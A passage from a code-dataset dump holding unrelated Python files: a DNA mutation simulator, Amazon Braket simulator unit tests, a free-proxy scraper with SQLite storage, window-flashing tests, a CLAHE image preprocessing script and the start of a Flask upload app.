# prob_* is the probability of the listed transition given as a float where 1.0 is 100%.\ndef mutate(sequence, prob_AtoG, prob_GtoA, prob_CtoT, prob_TtoC):\n    # strings are immutable, so work on a list of characters and join at the end\n    seq_list = list(sequence)\n    for i, char in enumerate(seq_list):\n        if char == \"A\":\n            if random.uniform(0.0, 1.0) < prob_AtoG:\n                seq_list[i] = \"G\"\n        elif char == \"C\":\n            if random.uniform(0.0, 1.0) < prob_CtoT:\n                seq_list[i] = \"T\"\n        elif char == \"G\":\n            if random.uniform(0.0, 1.0) < prob_GtoA:\n                seq_list[i] = \"A\"\n        elif char == \"T\":\n            if random.uniform(0.0, 1.0) < prob_TtoC:\n                seq_list[i] = \"C\"\n        else:\n            continue\n    return \"\".join(seq_list)\n\n# Make random mutations at random positions of data_seq and fill data_seq_mut\ndata_seq_mut = mutate(data_seq, 0.0001, 0.0001, 0.0001, 0.0001)\n\n# Pick num_of_slices random slice starting positions within the mutated sequence, then derive each start position's end position for the given slice length.\nmut_slice_pos_start = []\nfor x in range(num_of_slices):\n    mut_slice_pos_start.append(random.randint(0, data_length - bp_per_slice))\nmut_slice_pos_end = []\nfor start in mut_slice_pos_start:\n    mut_slice_pos_end.append(start + bp_per_slice)\n\n# Create empty dictionary. Keys are the slice start positions. Values are the slices from data_seq_mut.\nmut_slice_dict = {}\nfor start, end in zip(mut_slice_pos_start, mut_slice_pos_end):\n    mut_slice_dict[start] = data_seq_mut[start:end]\n\n# Output files (dictionaries are converted to str before writing)\nwith open(\"mutated_sequence.txt\", 'w') as output_file1:\n    output_file1.write(data_seq_mut)\nwith open(\"slices_original.txt\", 'w') as output_file2:\n    output_file2.write(str(slice_dict))\nwith open(\"slices_mutated.txt\", 'w') as output_file3:\n    output_file3.write(str(mut_slice_dict))","sub_path":"slicer_sim_test.py","file_name":"slicer_sim_test.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343405209","text":"# Copyright 2019-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n#     http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. 
See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport cmath\nimport json\nimport sys\nfrom collections import Counter, namedtuple\n\nimport numpy as np\nimport pytest\n\nfrom braket.default_simulator import gate_operations, observables\nfrom braket.default_simulator.result_types import Expectation, Variance\nfrom braket.default_simulator.simulator import DefaultSimulator\nfrom braket.device_schema.simulators import (\n GateModelSimulatorDeviceCapabilities,\n GateModelSimulatorDeviceParameters,\n)\nfrom braket.ir.jaqcd import Program\nfrom braket.simulator import BraketSimulator\nfrom braket.task_result import AdditionalMetadata, ResultTypeValue, TaskMetadata\n\nCircuitData = namedtuple(\"CircuitData\", \"circuit_ir probability_zero\")\n\n\n@pytest.fixture\ndef grcs_16_qubit():\n with open(\"test/resources/grcs_16.json\") as circuit_file:\n data = json.load(circuit_file)\n return CircuitData(Program.parse_raw(json.dumps(data[\"ir\"])), data[\"probability_zero\"])\n\n\n@pytest.fixture\ndef bell_ir():\n return Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ]\n }\n )\n )\n\n\n@pytest.fixture\ndef bell_ir_with_result():\n def _bell_ir_with_result(targets=None):\n return Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": [\n {\"type\": \"amplitude\", \"states\": [\"11\"]},\n {\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": targets},\n ],\n }\n )\n )\n\n return _bell_ir_with_result\n\n\n@pytest.mark.parametrize(\"batch_size\", [1, 5, 10])\ndef test_simulator_run_grcs_16(grcs_16_qubit, batch_size):\n simulator = DefaultSimulator()\n result = simulator.run(grcs_16_qubit.circuit_ir, qubit_count=16, shots=0, batch_size=batch_size)\n state_vector = result.resultTypes[0].value\n assert cmath.isclose(abs(state_vector[0]) ** 2, grcs_16_qubit.probability_zero, abs_tol=1e-7)\n\n\n@pytest.mark.parametrize(\"batch_size\", [1, 5, 10])\ndef test_simulator_run_bell_pair(bell_ir, batch_size):\n simulator = DefaultSimulator()\n shots_count = 10000\n result = simulator.run(bell_ir, qubit_count=2, shots=shots_count, batch_size=batch_size)\n\n assert all([len(measurement) == 2] for measurement in result.measurements)\n assert len(result.measurements) == shots_count\n counter = Counter([\"\".join(measurement) for measurement in result.measurements])\n assert counter.keys() == {\"00\", \"11\"}\n assert 0.4 < counter[\"00\"] / (counter[\"00\"] + counter[\"11\"]) < 0.6\n assert 0.4 < counter[\"11\"] / (counter[\"00\"] + counter[\"11\"]) < 0.6\n assert result.taskMetadata == TaskMetadata(\n id=result.taskMetadata.id, deviceId=DefaultSimulator.DEVICE_ID, shots=shots_count\n )\n assert result.additionalMetadata == AdditionalMetadata(action=bell_ir)\n\n\ndef test_simulator_identity():\n simulator = DefaultSimulator()\n shots_count = 1000\n result = simulator.run(\n Program.parse_raw(\n json.dumps({\"instructions\": [{\"type\": \"i\", \"target\": 0}, {\"type\": \"i\", \"target\": 1}]})\n ),\n qubit_count=2,\n shots=shots_count,\n )\n counter = Counter([\"\".join(measurement) for measurement in result.measurements])\n assert counter.keys() == {\"00\"}\n assert counter[\"00\"] == shots_count\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_no_results_no_shots(bell_ir):\n simulator = DefaultSimulator()\n 
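# shots=0 with no requested result types leaves nothing to compute, so this run must raise ValueError\n    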
simulator.run(bell_ir, qubit_count=2, shots=0)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_amplitude_shots():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"results\": [{\"type\": \"amplitude\", \"states\": [\"00\"]}],\n }\n )\n )\n simulator.run(ir, qubit_count=2, shots=100)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_amplitude_no_shots_invalid_states():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"results\": [{\"type\": \"amplitude\", \"states\": [\"0\"]}],\n }\n )\n )\n simulator.run(ir, qubit_count=2, shots=0)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_statevector_shots():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\"instructions\": [{\"type\": \"h\", \"target\": 0}], \"results\": [{\"type\": \"statevector\"}]}\n )\n )\n simulator.run(ir, qubit_count=2, shots=100)\n\n\ndef test_simulator_run_result_types_shots():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": [{\"type\": \"expectation\", \"observable\": [\"z\"], \"targets\": [1]}],\n }\n )\n )\n shots_count = 100\n result = simulator.run(ir, qubit_count=2, shots=shots_count)\n assert all([len(measurement) == 2] for measurement in result.measurements)\n assert len(result.measurements) == shots_count\n assert result.measuredQubits == [0, 1]\n assert not result.resultTypes\n\n\ndef test_simulator_run_result_types_shots_basis_rotation_gates():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"basis_rotation_instructions\": [{\"type\": \"h\", \"target\": 1}],\n \"results\": [{\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": [1]}],\n }\n )\n )\n shots_count = 1000\n result = simulator.run(ir, qubit_count=2, shots=shots_count)\n assert all([len(measurement) == 2] for measurement in result.measurements)\n assert len(result.measurements) == shots_count\n assert not result.resultTypes\n assert result.measuredQubits == [0, 1]\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_result_types_shots_basis_rotation_gates_value_error():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"basis_rotation_instructions\": [{\"type\": \"foo\", \"target\": 1}],\n \"results\": [{\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": [1]}],\n }\n )\n )\n shots_count = 1000\n simulator.run(ir, qubit_count=2, shots=shots_count)\n\n\n@pytest.mark.parametrize(\n \"ir, qubit_count\",\n [\n (\n Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"z\", \"target\": 2}],\n \"basis_rotation_instructions\": [],\n \"results\": [],\n }\n )\n ),\n 1,\n ),\n (\n Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"basis_rotation_instructions\": [{\"type\": \"z\", \"target\": 3}],\n \"results\": [],\n }\n )\n ),\n 2,\n ),\n ],\n)\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_non_contiguous_qubits(ir, qubit_count):\n simulator = 
DefaultSimulator()\n shots_count = 1000\n simulator.run(ir, qubit_count=qubit_count, shots=shots_count)\n\n\n@pytest.mark.parametrize(\n \"ir, qubit_count\",\n [\n (\n Program.parse_raw(\n json.dumps(\n {\n \"results\": [{\"targets\": [2], \"type\": \"expectation\", \"observable\": [\"z\"]}],\n \"basis_rotation_instructions\": [],\n \"instructions\": [{\"type\": \"z\", \"target\": 0}],\n }\n )\n ),\n 1,\n ),\n (\n Program.parse_raw(\n json.dumps(\n {\n \"results\": [{\"targets\": [2], \"type\": \"expectation\", \"observable\": [\"z\"]}],\n \"basis_rotation_instructions\": [],\n \"instructions\": [{\"type\": \"z\", \"target\": 0}, {\"type\": \"z\", \"target\": 1}],\n }\n )\n ),\n 2,\n ),\n ],\n)\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_observable_references_invalid_qubit(ir, qubit_count):\n simulator = DefaultSimulator()\n shots_count = 0\n simulator.run(ir, qubit_count=qubit_count, shots=shots_count)\n\n\n@pytest.mark.parametrize(\"batch_size\", [1, 5, 10])\n@pytest.mark.parametrize(\"targets\", [(None), ([1]), ([0])])\ndef test_simulator_bell_pair_result_types(bell_ir_with_result, targets, batch_size):\n simulator = DefaultSimulator()\n ir = bell_ir_with_result(targets)\n result = simulator.run(ir, qubit_count=2, shots=0, batch_size=batch_size)\n assert len(result.resultTypes) == 2\n assert result.resultTypes[0] == ResultTypeValue.construct(\n type=ir.results[0], value={\"11\": complex(1 / 2 ** 0.5)}\n )\n assert result.resultTypes[1] == ResultTypeValue.construct(\n type=ir.results[1], value=(0 if targets else [0, 0])\n )\n assert result.taskMetadata == TaskMetadata(\n id=result.taskMetadata.id, deviceId=DefaultSimulator.DEVICE_ID, shots=0\n )\n assert result.additionalMetadata == AdditionalMetadata(action=ir)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_fails_samples_0_shots():\n simulator = DefaultSimulator()\n prog = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"results\": [{\"type\": \"sample\", \"observable\": [\"x\"], \"targets\": [0]}],\n }\n )\n )\n simulator.run(prog, qubit_count=1, shots=0)\n\n\n@pytest.mark.parametrize(\n \"result_types,expected_expectation,expected_variance\",\n [\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": [1]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ],\n 0,\n 1,\n ),\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"x\"]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ],\n [0, 0],\n 1,\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [[[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [1],\n },\n {\n \"type\": \"variance\",\n \"observable\": [[[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [1],\n },\n ],\n 0,\n 1,\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [\"x\", [[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [0, 1],\n },\n {\n \"type\": \"expectation\",\n \"observable\": [\"x\", [[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [0, 1],\n },\n ],\n 1,\n 1,\n ),\n ],\n)\ndef test_simulator_accepts_overlapping_targets_same_observable(\n result_types, expected_expectation, expected_variance\n):\n simulator = DefaultSimulator()\n prog = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": result_types,\n }\n )\n )\n result = simulator.run(prog, qubit_count=2, shots=0)\n expectation = 
result.resultTypes[0].value\n variance = result.resultTypes[1].value\n assert np.allclose(expectation, expected_expectation)\n assert np.allclose(variance, expected_variance)\n\n\n@pytest.mark.xfail(raises=ValueError)\n@pytest.mark.parametrize(\n \"result_types\",\n [\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"y\"]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ]\n ),\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"y\"], \"targets\": [1]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ]\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [[[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [1],\n },\n {\n \"type\": \"variance\",\n \"observable\": [[[[1, 0], [0, 0]], [[0, 0], [1, 0]]]],\n \"targets\": [1],\n },\n ]\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [\"x\", [[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [0, 1],\n },\n {\"type\": \"variance\", \"observable\": [\"y\", \"x\"], \"targets\": [0, 1]},\n ]\n ),\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"i\"]},\n {\"type\": \"variance\", \"observable\": [\"y\"]},\n ]\n ),\n ],\n)\ndef test_simulator_fails_overlapping_targets_different_observable(result_types):\n simulator = DefaultSimulator()\n prog = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": result_types,\n }\n )\n )\n simulator.run(prog, qubit_count=2, shots=0)\n\n\n@pytest.mark.parametrize(\n \"obs1,obs2\",\n [\n (observables.PauliX([1]), observables.PauliX(None)),\n (observables.PauliZ([1]), observables.PauliZ(None)),\n (observables.Hermitian(np.eye(2), [1]), observables.Hermitian(np.eye(2), None)),\n ],\n)\ndef test_validate_and_consolidate_observable_result_types_none(obs1, obs2):\n obs_rts = [\n Expectation(obs1),\n Variance(obs2),\n ]\n actual_obs = DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 2)\n assert len(actual_obs) == 1\n assert actual_obs[0].measured_qubits is None\n\n\n@pytest.mark.parametrize(\n \"obs\",\n [(observables.PauliX([1])), (observables.PauliZ([1])), (observables.Hermitian(np.eye(2), [1]))],\n)\ndef test_validate_and_consolidate_observable_result_types_same_target(obs):\n obs_rts = [\n Expectation(obs),\n Variance(obs),\n ]\n actual_obs = DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 2)\n assert len(actual_obs) == 1\n assert actual_obs[0].measured_qubits == (1,)\n\n\ndef test_validate_and_consolidate_observable_result_types_tensor_product():\n obs_rts = [\n Expectation(observables.TensorProduct([observables.PauliX([0]), observables.PauliY([1])])),\n Variance(observables.TensorProduct([observables.PauliX([0]), observables.PauliY([1])])),\n Expectation(observables.TensorProduct([observables.PauliX([2]), observables.PauliY([3])])),\n ]\n actual_obs = DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 4)\n assert len(actual_obs) == 2\n assert actual_obs[0].measured_qubits == (0, 1,)\n assert actual_obs[1].measured_qubits == (2, 3,)\n\n\n@pytest.mark.parametrize(\n \"obs1,obs2\",\n [\n (observables.PauliX([1]), observables.PauliX([2])),\n (observables.PauliZ([1]), observables.PauliZ([2])),\n (observables.Hermitian(np.eye(2), [1]), observables.Hermitian(np.eye(2), [2])),\n ],\n)\ndef test_validate_and_consolidate_observable_result_types_targets(obs1, obs2):\n obs_rts = [\n Expectation(obs1),\n Expectation(obs2),\n ]\n actual_obs 
= DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 3)\n    assert len(actual_obs) == 2\n    assert actual_obs[0].measured_qubits == (1,)\n    assert actual_obs[1].measured_qubits == (2,)\n\n\ndef test_default_simulator_instance_braket_simulator():\n    assert isinstance(DefaultSimulator(), BraketSimulator)\n\n\ndef test_properties():\n    simulator = DefaultSimulator()\n    observables = [\"X\", \"Y\", \"Z\", \"H\", \"I\", \"Hermitian\"]\n    max_shots = sys.maxsize\n    qubit_count = 26\n    expected_properties = GateModelSimulatorDeviceCapabilities.parse_obj(\n        {\n            \"service\": {\n                \"executionWindows\": [\n                    {\n                        \"executionDay\": \"Everyday\",\n                        \"windowStartHour\": \"00:00\",\n                        \"windowEndHour\": \"23:59:59\",\n                    }\n                ],\n                \"shotsRange\": [0, max_shots],\n            },\n            \"action\": {\n                \"braket.ir.jaqcd.program\": {\n                    \"actionType\": \"braket.ir.jaqcd.program\",\n                    \"version\": [\"1\"],\n                    \"supportedOperations\": sorted(\n                        [\n                            instruction.__name__\n                            for instruction in gate_operations._from_braket_instruction.registry\n                            if type(instruction) is not type\n                        ]\n                    ),\n                    \"supportedResultTypes\": [\n                        {\n                            \"name\": \"Sample\",\n                            \"observables\": observables,\n                            \"minShots\": 1,\n                            \"maxShots\": max_shots,\n                        },\n                        {\n                            \"name\": \"Expectation\",\n                            \"observables\": observables,\n                            \"minShots\": 0,\n                            \"maxShots\": max_shots,\n                        },\n                        {\n                            \"name\": \"Variance\",\n                            \"observables\": observables,\n                            \"minShots\": 0,\n                            \"maxShots\": max_shots,\n                        },\n                        {\"name\": \"Probability\", \"minShots\": 0, \"maxShots\": max_shots},\n                        {\"name\": \"StateVector\", \"minShots\": 0, \"maxShots\": 0},\n                        {\"name\": \"Amplitude\", \"minShots\": 0, \"maxShots\": 0},\n                    ],\n                }\n            },\n            \"paradigm\": {\"qubitCount\": qubit_count},\n            \"deviceParameters\": GateModelSimulatorDeviceParameters.schema(),\n        }\n    )\n    assert simulator.properties == expected_properties\n","sub_path":"test/unit_tests/braket/default_simulator/test_simulator.py","file_name":"test_simulator.py","file_ext":"py","file_size_in_byte":19999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565534433","text":"# coding: utf-8\n'''\nFetch working proxy IPs from http://www.xicidaili.com/nn/\n'''\n\nimport requests\nimport codecs\nfrom lxml import etree\nimport sqlite3, time\nimport argparse\n\n\nclass getProxy():\n    def __init__(self):\n        self.user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'\n        self.header = {'User-Agent': self.user_agent}\n        self.db = 'proxy.db'\n        self.now = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n    def get_html(self, num):\n        url = 'http://www.xicidaili.com/nn/' + str(num)\n        rep = requests.get(url, headers=self.header).content\n        soup = etree.HTML(rep)\n        ipList = soup.xpath('//tr/td[2]/text()')\n        portList = soup.xpath('//tr/td[3]/text()')\n\n        for ip, port in zip(ipList, portList):\n            if self.isAlive(ip, port):\n                self.insert_db(ip, port, self.now)\n\n    def isAlive(self, ip, port):\n        proxy = {\"http\": '%s:%s' % (ip, port)}\n\n        # keep only proxies that answer through themselves in under 10 seconds\n        try:\n            rep = requests.get('https://www.baidu.com/', proxies=proxy, timeout=10)\n        except requests.exceptions.RequestException:\n            print(\"%s failed or timed out (>10s)\" % ip)\n            return False\n\n        if rep.status_code == 200:\n            print(\"%s work\" % ip)\n            # print(rep.content)\n            return True\n        else:\n            print(\"%s not work\" % ip)\n            return False\n\n    def insert_db(self, ip, port, time):\n        db = self.db.split('.')[0]\n        try:\n            conn = sqlite3.connect(self.db)\n        except:\n            print('failed to open database %s' % db)\n        # build a composite primary key on ip and port\n        create_tb = '''\n        create table if not exists %s\n        (ip text,\n        
port text,\n        date text,\n        CONSTRAINT ip_port PRIMARY KEY (ip, port));\n        ''' % db\n        c = conn.cursor()\n        c.execute(create_tb)\n        insert_cmd = \"insert into proxy values ('%s', '%s', '%s')\" % (ip, port, time)\n        # skip duplicate ips (the composite key rejects them)\n        try:\n            c.execute(insert_cmd)\n        except:\n            print('duplicate ip %s' % ip)\n        conn.commit()\n        conn.close()\n\n    def check_db_ip(self):\n        # verify that the ips already stored in the db still work\n        db = self.db.split('.')[0]\n        conn = sqlite3.connect(self.db)\n        c = conn.cursor()\n        for row in c.execute('select DISTINCT ip, port from %s' % db):\n            if not self.isAlive(row[0], row[1]):\n                delete_cmd = \"delete from %s where ip='%s'\" % (db, row[0])\n                c.execute(delete_cmd)\n                conn.commit()\n        conn.close()\n\n    def loop(self, num):\n        for i in range(num):\n            self.get_html(i+1)\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='this is a python get proxy program')\n    parser.add_argument('-r', '--nocrawl', action='store_false', default=True, help='stop crawl', dest='r')\n    parser.add_argument('-c', '--nocheck', action='store_false', default=True, help='stop check db ip', dest='c')\n    parser.add_argument('-n', action='store', choices=[1, 2, 3, 4, 5], help='set crawl number, default 2', default=2, type=int)\n    result = parser.parse_args()\n\n    myproxy = getProxy()\n    if result.r:\n        print('start crawl')\n        myproxy.loop(result.n)\n    else:\n        print('stop crawl')\n\n    if result.c:\n        print('start check db ip')\n        myproxy.check_db_ip()\n    else:\n        print('stop check db ip')\n\n    print('done')\n\n\n","sub_path":"get_proxy_ip.py","file_name":"get_proxy_ip.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262682759","text":"\"\"\"Test suite for the server module.\"\"\"\nfrom threading import Thread\nfrom time import sleep\n\ntry:\n    from unittest.mock import (\n        call,\n        MagicMock,\n    )\nexcept ImportError:\n    from mock import (\n        call,\n        MagicMock,\n    )\n\nfrom pytest import (\n    approx,\n    mark,\n)\n\nimport flashfocus.xutil as xutil\nfrom test.helpers import (\n    change_focus,\n    SelfDestructingFocusWait,\n    WindowWatcher,\n)\n\n\n@mark.parametrize('pre_opacity', [\n    (0.8), (1), (None), (0.5)\n])\ndef test_flash_window(flasher, window, pre_opacity):\n    if pre_opacity:\n        xutil.set_opacity(window, pre_opacity)\n    expected_opacity = (\n        [pre_opacity] +\n        flasher.compute_flash_series(pre_opacity) +\n        [pre_opacity])\n    # WindowWatcher collapses runs of the same value\n    if all(x == expected_opacity[0] for x in expected_opacity):\n        expected_opacity = [expected_opacity[0]]\n    watcher = WindowWatcher(window)\n    watcher.start()\n    flasher.flash_window(window)\n    assert watcher.report() == approx(expected_opacity, 0.01)\n\n\ndef test_flash_nonexistant_window_ignored(flasher):\n    flasher.flash_window(0)\n\n\n@mark.parametrize('focus_indices,flash_indices', [\n    # Test normal usage\n    ([1, 0, 1], [1, 0, 1]),\n    # Test that focusing on same window twice only flashes once\n    ([0, 0], [0])\n])\ndef test_monitor_focus(flasher, windows, focus_indices, flash_indices,\n                       monkeypatch):\n    focus_shifts = [windows[i] for i in focus_indices]\n    expected_calls = [call(windows[i]) for i in flash_indices]\n    flasher.flash_window = MagicMock()\n    monkeypatch.setattr(\n        xutil, 'wait_for_focus_shift',\n        SelfDestructingFocusWait(len(focus_indices) + 2))\n    p = Thread(target=flasher.monitor_focus)\n    p.start()\n\n    for window in focus_shifts:\n        change_focus(window)\n        sleep(0.2)\n        # This would normally be done by the flash_window method\n        flasher.locked_windows.discard(window)\n\n    p.join()\n
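    # one recorded flash per effective focus change; repeating the same focus collapses to a single call\n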
    assert flasher.flash_window.call_args_list == expected_calls\n\n\n@mark.parametrize(\n    'flash_opacity,preflash_opacity,ntimepoints,expected_result', [\n        # test typical usecase\n        (0.8, None, 4, [0.8, 0.85, 0.9, 0.95]),\n        # test that it still works when flash opacity > preflash opacity\n        (1, 0.8, 4, [1, 0.95, 0.9, 0.85]),\n        # test that opacity=1 gives same result as opacity=none\n        (0.8, 1, 4, [0.8, 0.85, 0.9, 0.95]),\n        # test for single chunk\n        (0.8, 1, 1, [0.8])\n    ]\n)\ndef test_compute_flash_series(flash_opacity, preflash_opacity, ntimepoints,\n                              expected_result, flasher):\n    flasher.flash_opacity = flash_opacity\n    flasher.ntimepoints = ntimepoints\n    assert (flasher.compute_flash_series(preflash_opacity) ==\n            approx(expected_result, 0.0001))\n    if preflash_opacity:\n        assert (flasher.flash_series_hash[preflash_opacity] ==\n                approx(expected_result, 0.0001))\n","sub_path":"test/test_flasher.py","file_name":"test_flasher.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540846554","text":"import imutils\nimport cv2\nimport os\n\ninter = cv2.INTER_AREA\n\n\nfolder = r'D:\\UNIMA\\keras-retinanet\\Keras-retinanet-Training-on-custom-datasets-for-Object-Detection--master\\imagenes\\tarjetas_olaf_recortados\\output\\positivos_negativos_prueba'\nfilenames = os.listdir(folder)\npaths = [os.path.join(folder, filename) for filename in filenames]\nfolder_perspectives = r'D:\\UNIMA\\keras-retinanet\\Keras-retinanet-Training-on-custom-datasets-for-Object-Detection--master\\imagenes\\tarjetas_olaf_recortados\\output\\prueba'\n\n\ni = 0\nfor path, filename in zip(paths, filenames):  # iterate over each image path together with its filename\n\n    image = cv2.imread(path)\n    ## CLAHE (Contrast Limited 
Adaptive Histogram Equalization)\n #clahe = cv2.createCLAHE(clipLimit=3., tileGridSize=(8, 8))\n # convert image from RGB to HSV\n #img_hsv = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)\n ## Histogram equalisation on the V-channel\n #img_hsv[:, :, 2] = clahe.apply(img_hsv[:, :, 2])\n ## convert image back from HSV to RGB\n #image = cv2.cvtColor(img_hsv, cv2.COLOR_HSV2RGB)\n\n\n\n\n # -----Converting image to LAB Color model-----------------------------------\n lab = cv2.cvtColor(image, cv2.COLOR_BGR2LAB)\n\n # -----Splitting the LAB image to different channels-------------------------\n l, a, b = cv2.split(lab)\n\n # -----Applying CLAHE to L-channel-------------------------------------------\n clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))\n cl = clahe.apply(l)\n\n\n # -----Merge the CLAHE enhanced L-channel with the a and b channel-----------\n limg = cv2.merge((cl, a, b))\n\n # -----Converting image from LAB Color model to RGB model--------------------\n final = cv2.cvtColor(limg, cv2.COLOR_LAB2BGR)\n\n # _____END_____#\n name = os.path.splitext(filename)[0]\n cv2.imwrite(os.path.join(folder_perspectives, name +\".jpg\"), final)\n ##cv2.imwrite(os.path.join(folder_perspectives, \"positive.\" + str(i) +\".jpg\"), image)\n i=i+1\n","sub_path":"classification_networks/preprocess_image.py","file_name":"preprocess_image.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78813368","text":"# app.py\n#!bin/python\nfrom logging import debug\nfrom flask import Flask, request, render_template\nfrom bson.objectid import ObjectId\nfrom flask.config import Config\nfrom pymongo import results\nfrom models import searchForm, InsertPubForm, InsertModelForm, InsertImgForm, testImgForm,testPubForm\nfrom flask_bootstrap import Bootstrap\nimport backend as be\nimport os\n\napp = Flask(__name__)\n\nc = be.loadConf()\nstore_type = 'fs'\napp.config.from_mapping(\n SECRET_KEY= os.urandom(32))\nBootstrap(app)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/insertOption')\ndef insertOption():\n return render_template('insertOption.html')\n\n@app.route('/insertPUB', methods=['GET', 'POST'])\ndef insertPUB():\n form = testPubForm()\n if request.method == 'POST' and form.validate_on_submit():\n pub=form.pub.data\n objecthash, extension = be.workOnObj(pub, store_type)\n\n # Prepare metadata\n metadata={}\n \n asset = {}\n asset['title'] = request.form['title']\n asset['description'] = request.form['description']\n asset['authorship'] = request.form['authorship']\n asset['coordinates'] = {}\n asset['coordinates']['latitude'] = None\n asset['coordinates']['longitude'] = None\n asset['license'] = request.form['license']\n metadata['asset'] = asset\n project = {}\n project['name'] = request.form['project_name']\n project['year'] = request.form['project_year']\n project['url'] = request.form['project_url']\n project['partners'] = request.form['project_partners']\n metadata['project'] = project\n\n objectdata = {}\n objectdata['filename'] = pub.filename\n objectdata['type'] = 'publication'\n objectdata['extension'] = extension\n objectdata['hash'] = objecthash\n storedata = {}\n storedata['type'] = store_type\n\n doc = {}\n doc['metadata'] = metadata\n doc['objectdata'] = objectdata\n doc['storedata'] = storedata\n\n\n be.upload2mongo(doc,'pubs')\n return render_template('uploadDone.html')\n return render_template('testPubForm.html',form=form)\n\n@app.route('/insertMODEL', 
